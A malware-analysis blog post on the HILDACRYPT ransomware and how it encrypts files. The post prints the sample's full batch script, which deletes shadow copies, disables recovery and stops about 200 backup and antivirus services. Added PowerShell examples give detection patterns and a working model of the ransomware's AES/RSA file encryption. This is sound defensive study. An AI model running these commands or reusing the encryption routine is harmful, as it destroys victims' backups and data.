HILDACRYPT: new ransomware targets backup systems and antivirus solutions

Hello, Habr! Once again we are looking at a new member of the ransomware class. HILDACRYPT is a new ransomware from the Hilda family, discovered in August 2019 and named after the Netflix cartoon series that was used in distributing the malware. Today we go through the technical features of this new ransomware.


In the first version of the Hilda ransomware, the ransom note contained a link to the YouTube trailer of the cartoon series. HILDACRYPT masquerades as a legitimate installer of XAMPP, an easy-to-install Apache distribution that bundles MariaDB, PHP and Perl. The cryptolocker's file name differs slightly, though: xamp, with a single "p". The ransomware file also carries no digital signature.

Static analysis

The ransomware is a PE32 .NET executable for MS Windows, 135 168 bytes in size. Both the main program code and its protection layer are written in C#. According to the timestamp, the binary was built on September 14.


According to Detect It Easy, the ransomware is packed with Confuser and ConfuserEx, but these obfuscators are essentially the same tool: ConfuserEx is just the successor to Confuser, so their code signatures coincide.


HILDACRYPT is indeed packed with ConfuserEx.


SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Attack vector

Most likely the ransomware was hosted on one of the web-programming sites, passed off as the legitimate XAMPP package.

The whole infection chain can be viewed in the app.any.run sandbox.

Obfuscation

The ransomware's strings are stored in encrypted form. At launch, HILDACRYPT decodes them with Base64 and decrypts them with AES-256-CBC.


Setup

First, the ransomware creates a folder in the user's AppData\Roaming directory in which it creates a GUID (Globally Unique Identifier) value. It then drops a .bat file into that location and launches it via cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & exit

It then runs the batch script, which disables system features and services.


The script is a long list of commands that delete shadow copies and stop SQL Server instances, backup products and antivirus solutions.

For example, it tries, unsuccessfully, to stop the Acronis Backup services. It also targets backup and antivirus products from the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
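As an added example (not part of the original article and not the malware's code), the PowerShell below scores Sysmon-style process-creation records for the behaviour of this script: any single vssadmin or bcdedit tampering command is flagged on its own, while `net stop` calls are only flagged when many of them come from one parent process within a short window, with the vendor names from the script used to say how many hit backup or antivirus services. The field names Time, ParentImage and CommandLine mirror Sysmon Event ID 1 and are an assumption; the records themselves are constructed samples.

```powershell
# Added example, not from the article or the malware: flags the behaviour of the
# batch script above in Sysmon-style process-creation records. Field names
# (Time, ParentImage, CommandLine) mirror Sysmon Event ID 1 and are assumed;
# the records at the bottom are constructed samples.

function Find-BackupKillerActivity {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $StopThreshold = 5,      # this many 'net stop' calls ...
        [int] $WindowSeconds = 120     # ... within this window from one parent is a burst
    )
    $findings = [System.Collections.Generic.List[object]]::new()

    # One matching command line is enough: shadow-copy and recovery tampering
    $atomic = @(
        @{ Name = 'ShadowCopyDeletion';  Pattern = '\bvssadmin(\.exe)?\s+delete\s+shadows\b' }
        @{ Name = 'ShadowStorageResize'; Pattern = '\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b' }
        @{ Name = 'RecoveryDisabled';    Pattern = '\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b' }
        @{ Name = 'BootStatusIgnored';   Pattern = '\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b' }
    )
    foreach ($e in $Events) {
        foreach ($sig in $atomic) {
            if ($e.CommandLine -match $sig.Pattern) {      # -match is case-insensitive
                $findings.Add([pscustomobject]@{ Time = $e.Time; Finding = $sig.Name; Detail = $e.CommandLine })
            }
        }
    }

    # A single 'net stop' is routine; many of them from one parent in a short
    # window, aimed at backup/AV services, is the pattern worth alerting on.
    $stopRegex   = '\bnet1?(\.exe)?\s+stop\s+(?:"([^"]+)"|(\S+))'
    $vendorRegex = 'veeam|sophos|acronis|acrsch|mcafee|mcshield|mfe|kav|klnagent|avp|sav|sep|smc|backupexec|bedbg|wbengine|sqlwriter|vss|ekrn|ntrtscan|tmlisten|mbam|mozy'
    $stops = foreach ($e in $Events) {
        if ($e.CommandLine -match $stopRegex) {
            $svc = if ($Matches[2]) { $Matches[2] } else { $Matches[3] }   # quoted or bare service name
            [pscustomobject]@{ Time = $e.Time; Parent = $e.ParentImage; Service = $svc }
        }
    }
    foreach ($group in @($stops | Group-Object Parent)) {
        $ordered  = @($group.Group | Sort-Object Time)
        $span     = ($ordered[-1].Time - $ordered[0].Time).TotalSeconds
        $targeted = @($ordered | Where-Object { $_.Service -match $vendorRegex })
        if ($ordered.Count -ge $StopThreshold -and $span -le $WindowSeconds) {
            $findings.Add([pscustomobject]@{
                Time    = $ordered[0].Time
                Finding = 'MassServiceStop'
                Detail  = "$($ordered.Count) stops in $([int]$span)s from $($group.Name); $($targeted.Count) hit backup/AV services: " +
                          (($targeted.Service | Select-Object -Unique) -join ', ')
            })
        }
    }
    return $findings
}

# Constructed sample: a trimmed replay of the script, plus one benign stop from an admin console
$t   = [datetime]'2019-09-14T10:00:00'
$cmd = 'C:\Windows\System32\cmd.exe'
$SampleEvents = @(
    [pscustomobject]@{ Time = $t.AddSeconds(1);  ParentImage = $cmd; CommandLine = 'vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB' }
    [pscustomobject]@{ Time = $t.AddSeconds(2);  ParentImage = $cmd; CommandLine = 'bcdedit /set {default} recoveryenabled No' }
    [pscustomobject]@{ Time = $t.AddSeconds(3);  ParentImage = $cmd; CommandLine = 'vssadmin Delete Shadows /all /quiet' }
    [pscustomobject]@{ Time = $t.AddSeconds(4);  ParentImage = $cmd; CommandLine = 'net stop "Sophos Device Control Service" /y' }
    [pscustomobject]@{ Time = $t.AddSeconds(5);  ParentImage = $cmd; CommandLine = 'net stop VeeamBackupSvc /y' }
    [pscustomobject]@{ Time = $t.AddSeconds(6);  ParentImage = $cmd; CommandLine = 'net stop AcrSch2Svc /y' }
    [pscustomobject]@{ Time = $t.AddSeconds(7);  ParentImage = $cmd; CommandLine = 'net stop McShield /y' }
    [pscustomobject]@{ Time = $t.AddSeconds(8);  ParentImage = $cmd; CommandLine = 'net stop MSSQLSERVER /y' }
    [pscustomobject]@{ Time = $t.AddMinutes(30); ParentImage = 'C:\Windows\System32\mmc.exe'; CommandLine = 'net stop Spooler' }
)
Find-BackupKillerActivity -Events $SampleEvents | Sort-Object Time | Format-Table -AutoSize
```

On the sample above this yields four atomic findings (two vssadmin, one bcdedit, one shadow deletion) and one MassServiceStop finding for cmd.exe covering five stops in four seconds, four of them against backup or AV services; the lone `net stop Spooler` from mmc.exe stays below the threshold. The vendor list is deliberately loose (short fragments such as `sav` or `sep`) because it only ranks a burst that has already tripped the count, not a single event.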

Once the services and processes listed above have been stopped, the cryptolocker enumerates all running processes with the tasklist command to confirm that the relevant services are really down:
tasklist /v /fo csv

This command prints a verbose list of processes as comma-separated fields, one line per process, for example:
"csrss.exe","448","Services","0","1,896 K","Unknown","N/A","0:00:03","N/A"


After this check, the ransomware starts the encryption routine.

Encryption

File encryption

HILDACRYPT walks the entire contents of every drive it finds, except Recycle.Bin and Reference Assemblies\Microsoft. The latter holds the dll, pdb and similar files that .NET applications depend on, and touching them could break the ransomware itself. To select files for encryption it uses the following extension list:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

The ransomware encrypts user files with AES-256-CBC: the key is 256 bits and the initialization vector (IV) is 16 bytes.


In the decompiled code, the byte_2 and byte_1 buffers (the key and the IV) are filled with random bytes by GetBytes().


Key


IV


Encrypted files receive the .HCY! extension. The key and IV shown above were generated for the sample file used in this analysis.


Key encryption

The cryptolocker stores the generated AES key inside the encrypted file itself. The start of an encrypted file is a header with the fields HILDACRYPT, KEY, IV and FileLen in XML form.


The AES key and IV are encrypted with RSA-2048 and the result is Base64-encoded. The RSA public key is kept in the cryptolocker body as one of the encrypted strings, in XML format:

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

The RSA public key is used to encrypt the per-file AES key. It is Base64-encoded and consists of a modulus and the public exponent 65537. Decryption requires the RSA private key, which only the attacker holds.

After RSA encryption, the AES key is Base64-encoded and stored in the encrypted file.
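To make the scheme concrete, here is an added example (not the sample's own code) that rebuilds the key handling described under "File encryption" and "Key encryption" with the same .NET classes a C# sample would call: a fresh AES-256-CBC key and IV per file, both wrapped with an RSA-2048 public key in the `<RSAKeyValue>` XML form that RSACryptoServiceProvider.ToXmlString produces (the `AQAB` tail of the key quoted above is the exponent 65537 in Base64), and an XML header placed in front of the ciphertext. The exact element layout of the header and the use of OAEP padding are assumptions; the article names only the fields HILDACRYPT, KEY, IV and FileLen. The AES-CBC plus Base64 step is the same primitive the sample's string decoder uses, with a static key instead of a wrapped one.

```powershell
# Added example, not the ransomware's code: models the per-file AES-256-CBC key
# wrapped with RSA-2048 (e = 65537) and Base64-encoded into an XML header, using
# the .NET primitives the sample uses. Header element layout and OAEP padding
# are assumptions; the article names only HILDACRYPT, KEY, IV and FileLen.

function New-AttackerKeyPair {
    # Generated once by the attacker. Only the public half (Modulus + Exponent
    # AQAB, i.e. 65537) travels in the binary; the private half never does.
    $rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new(2048)
    [pscustomobject]@{
        PublicXml  = $rsa.ToXmlString($false)
        PrivateXml = $rsa.ToXmlString($true)
    }
}

function Protect-FileLikeHildacrypt {
    param([byte[]] $Plain, [string] $PublicKeyXml)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256; $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    $aes.GenerateKey(); $aes.GenerateIV()          # 32-byte key, 16-byte IV, fresh per file
    $body = $aes.CreateEncryptor().TransformFinalBlock($Plain, 0, $Plain.Length)

    $rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new()
    $rsa.FromXmlString($PublicKeyXml)              # same XML form as the key quoted above
    $key64 = [Convert]::ToBase64String($rsa.Encrypt($aes.Key, $true))   # $true = OAEP (assumed)
    $iv64  = [Convert]::ToBase64String($rsa.Encrypt($aes.IV,  $true))

    $header = "<HILDACRYPT><KEY>$key64</KEY><IV>$iv64</IV><FileLen>$($Plain.Length)</FileLen></HILDACRYPT>"
    return [byte[]]([Text.Encoding]::UTF8.GetBytes($header) + $body)   # header, then ciphertext
}

function Unprotect-FileLikeHildacrypt {
    param([byte[]] $Blob, [string] $PrivateKeyXml)
    # Latin-1 maps bytes 1:1 to chars, so string offsets equal byte offsets.
    $text = [Text.Encoding]::GetEncoding('ISO-8859-1').GetString($Blob)
    $idx  = $text.IndexOf('</HILDACRYPT>')
    if ($idx -lt 0) { throw 'no HILDACRYPT header found' }
    $end  = $idx + '</HILDACRYPT>'.Length
    [xml]$hdr = $text.Substring(0, $end)
    $body = [byte[]]($Blob[$end..($Blob.Length - 1)])

    $rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new()
    $rsa.FromXmlString($PrivateKeyXml)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode = 'CBC'; $aes.Padding = 'PKCS7'
    # Decrypt throws if the imported XML held only the public half: that is the point
    $aes.Key = $rsa.Decrypt([Convert]::FromBase64String($hdr.HILDACRYPT.KEY), $true)
    $aes.IV  = $rsa.Decrypt([Convert]::FromBase64String($hdr.HILDACRYPT.IV),  $true)
    $plain = $aes.CreateDecryptor().TransformFinalBlock($body, 0, $body.Length)
    if ($plain.Length -ne [int]$hdr.HILDACRYPT.FileLen) { throw 'FileLen mismatch' }
    return $plain
}

# Usage with constructed content (not a real victim file)
$keys   = New-AttackerKeyPair
$sample = [Text.Encoding]::UTF8.GetBytes('quarterly-report.docx contents (constructed sample)')
$blob   = Protect-FileLikeHildacrypt -Plain $sample -PublicKeyXml $keys.PublicXml
[Text.Encoding]::UTF8.GetString([byte[]]($blob[0..60]))   # header is readable; the body is not

# With the attacker's private key the file comes back:
$back = Unprotect-FileLikeHildacrypt -Blob $blob -PrivateKeyXml $keys.PrivateXml
[Text.Encoding]::UTF8.GetString($back)

# With only the public key (all the victim has), unwrapping the AES key fails:
try   { Unprotect-FileLikeHildacrypt -Blob $blob -PrivateKeyXml $keys.PublicXml | Out-Null }
catch { "decryption without the private key failed: $($_.Exception.Message)" }
```

The header in this model is plain XML that any analyst can read, so the wrapped key and IV are visible in every encrypted file, but they are 256-byte RSA ciphertexts and useless without the private key. That is why recovery depends entirely on the attacker and why the shadow-copy and backup-killing steps in the batch script matter: they remove the only copies of the data that do not go through this header.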

Ransom note

Once encryption is complete, HILDACRYPT writes an html file into each folder whose files it encrypted. The ransom note contains two email addresses through which the victim can contact the attacker.


The ransom note also contains the line "No loli is safe ;)", a reference to anime and manga characters drawn to look like little girls, which is banned in Japan.

Conclusion

HILDACRYPT, a new ransomware family, has appeared in a new version. Its encryption model leaves the victim unable to decrypt the files the ransomware has encrypted. The cryptolocker actively disables protection services belonging to backup systems and antivirus solutions. The author of HILDACRYPT is a fan of the Netflix series Hilda; the ransom note of the previous version contained a link to its trailer.

As usual, Acronis Backup and Acronis True Image can protect your computer from the HILDACRYPT ransomware, and service providers can protect their customers with Acronis Backup Cloud. Protection comes from the fact that these solutions combine backup with the integrated Acronis Active Protection security component, enhanced by a machine-learning model and based on behavioral heuristics, a technology capable of countering zero-day ransomware threats like no other.

Indicators of compromise

Files with the .HCY! extension
HILDACRYPTReadMe.html
xamp.exe with a single "p" and no digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
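As an added example (not from the original article), the following PowerShell turns the indicators above into a sweep over a directory tree: it reports files by the .HCY! extension and the ransom-note name, and for any xamp.exe it checks the Authenticode status and compares the SHA-256 with the published hash. The function name and the temporary sample tree it is run against are constructed for illustration; the xamp.exe in the demo is an empty file, not the sample.

```powershell
# Added example, not from the article: sweeps a tree for the HILDACRYPT
# indicators listed above. The demo tree at the bottom is constructed; the
# xamp.exe it creates is an empty placeholder, not the malware.
$HildacryptSha256 = '7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a'

function Find-HildacryptIndicators {
    param([Parameter(Mandatory)][string] $Path)
    $hits = [System.Collections.Generic.List[object]]::new()
    foreach ($f in Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue) {
        $why = @()
        if ($f.Extension -eq '.HCY!')             { $why += 'encrypted-file extension' }   # -eq ignores case
        if ($f.Name -eq 'HILDACRYPTReadMe.html')  { $why += 'ransom note' }
        if ($f.Name -eq 'xamp.exe') {                                                      # one "p", unlike XAMPP
            $why += 'xamp.exe name'
            $sig = Get-AuthenticodeSignature -FilePath $f.FullName
            if ($sig.Status -ne 'Valid') { $why += "no valid signature ($($sig.Status))" }
            $hash = (Get-FileHash -Path $f.FullName -Algorithm SHA256).Hash
            if ($hash -ieq $HildacryptSha256) { $why += 'SHA-256 matches the published sample' }
        }
        if ($why) { $hits.Add([pscustomobject]@{ Path = $f.FullName; Indicators = ($why -join '; ') }) }
    }
    return $hits
}

# Demo on a constructed tree (no real malware involved)
$demo = Join-Path ([IO.Path]::GetTempPath()) ('hilda-ioc-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path "$demo\docs" | Out-Null
'ciphertext placeholder' | Set-Content "$demo\docs\budget.xlsx.HCY!"
'<html>ransom note placeholder</html>' | Set-Content "$demo\docs\HILDACRYPTReadMe.html"
New-Item -ItemType File -Path "$demo\xamp.exe" | Out-Null
Find-HildacryptIndicators -Path $demo | Format-Table -AutoSize
Remove-Item -Recurse -Force $demo
```

On the demo tree this lists three hits: the encrypted file, the note, and xamp.exe flagged for its name and missing signature (the hash line will not appear, since the placeholder is empty). On a real host, run it against user profiles and mapped drives, and treat a signature status other than Valid on anything named xamp.exe as enough to isolate the machine even before the hash is confirmed.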

source: www.habr.com
